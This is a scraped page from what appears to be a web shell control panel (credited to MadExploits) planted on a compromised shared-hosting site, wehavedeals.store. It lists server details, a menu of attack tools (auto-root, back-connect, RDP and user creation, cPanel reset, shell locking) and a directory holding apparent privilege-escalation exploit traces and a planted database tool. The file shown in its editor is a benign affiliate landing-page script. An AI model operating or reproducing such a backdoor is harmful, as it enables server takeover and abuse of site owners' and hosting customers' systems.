Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.21.93.14
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
public_html /
wehavedeals.store /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
offer
[ DIR ]
drwxr-xr-x
.DS_Store
8
KB
-rw-r--r--
.htaccess
533
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
app.js
2.07
KB
-rw-r--r--
contact.html
2.32
KB
-rw-r--r--
index.html
1.84
KB
-rw-r--r--
privacy.html
1.88
KB
-rw-r--r--
product.png
99.44
KB
-rw-r--r--
reviews.png
6.49
KB
-rw-r--r--
styles.css
1.96
KB
-rw-r--r--
terms.html
1.91
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : app.js
document.addEventListener('DOMContentLoaded', function() { // Define product info var productName = "Probiotic +"; var productImage = "https://d9hhrg4mnvzow.cloudfront.net/pages.upwellness.com/uc-proplus/43dc735f-shadow-probioticplus-front_10gg0v20gg0ky000000028.png"; var geoOptions = [ {text: "Select Country...", value: ""}, {text: "United States of America", value: "offer/index.php"}, // {text: "CountryName", value: "AffiliateURL"}, ]; // Set product info document.getElementById('product-name').innerText = productName; document.getElementById('product-image').src = productImage; // Set Geo Selector options var geoSelector = document.getElementById('geo-selector'); geoOptions.forEach(function(option) { var opt = document.createElement('option'); opt.value = option.value; opt.innerHTML = option.text; opt.disabled = option.text === "Select Country..." ? true : false; opt.selected = option.text === "Select Country..." ? true : false; geoSelector.appendChild(opt); }); // Listen for changes on the geo-selector element geoSelector.addEventListener('change', function() { // Navigate to the selected URL var url = this.value; if (url !== '') { window.location.href = url; } }); // Get flags for each country const flagsContainer = document.getElementById('flags-container'); // Ignore the first option "Select Country..." when fetching the flags geoOptions.slice(1).forEach(option => { fetch(`https://restcountries.com/v3.1/name/${option.text}?fullText=true`) .then(response => response.json()) .then(data => { const flagUrl = data[0].flags.svg; const img = document.createElement('img'); img.src = flagUrl; img.style.height = '16px'; img.classList.add('mx-2'); flagsContainer.appendChild(img); }) .catch(error => console.error('Error:', error)); }); });
Close